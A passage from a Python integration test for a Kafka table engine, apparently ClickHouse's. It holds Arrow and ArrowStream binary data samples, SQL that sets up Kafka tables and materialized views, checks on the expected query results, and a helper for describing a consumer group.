x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
],
},
'ArrowStream' : {
'data_sample' : [
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
],
},
}
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Set up {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = '{format_name}',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name};
'''.format(topic_name=topic_name, format_name=format_name,
extra_settings=format_opts.get('extra_settings') or ''))
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*format_tests_', repetitions=len(all_formats.keys()), look_behind_lines=12000)
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Checking {}'.format(format_name)))
topic_name = f'format_tests_{format_name}'
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
kafka_delete_topic(admin_client, topic_name)
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
# https://stackoverflow.com/a/57692111/1555175
def describe_consumer_group(kafka_cluster, name):
client = BrokerConnection('localhost', kafka_cluster.kafka_port, socket.AF_INET)
client.connect_blocking()
list_members_in_groups = DescribeGroupsRequest_v1(groups=[name])
future = client.send(list_members_in_groups)
while not future.is_done:
for resp, f in client.recv():
f.success(resp)
(error_code, group_id, state, protocol_type, protocol, members) = future.value.groups[0]
res = []
for member in members:
(member_id, client_id, client_host, member_metadata, member_assignment) = member
member_info = {}
member_info['member_id'] = member_id
member_info['client_id'] = client_id
member_info['client_host'] = client_host
member_topics_assignment = []
for (topic, partitions) in MemberAssignment.decode(member_assignment).assignment:
member_topics_assignment.append({'topic': topic, 'partitions': partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print(("kafka_id is {}".format(kafka_id)))
yield cluster
finally:
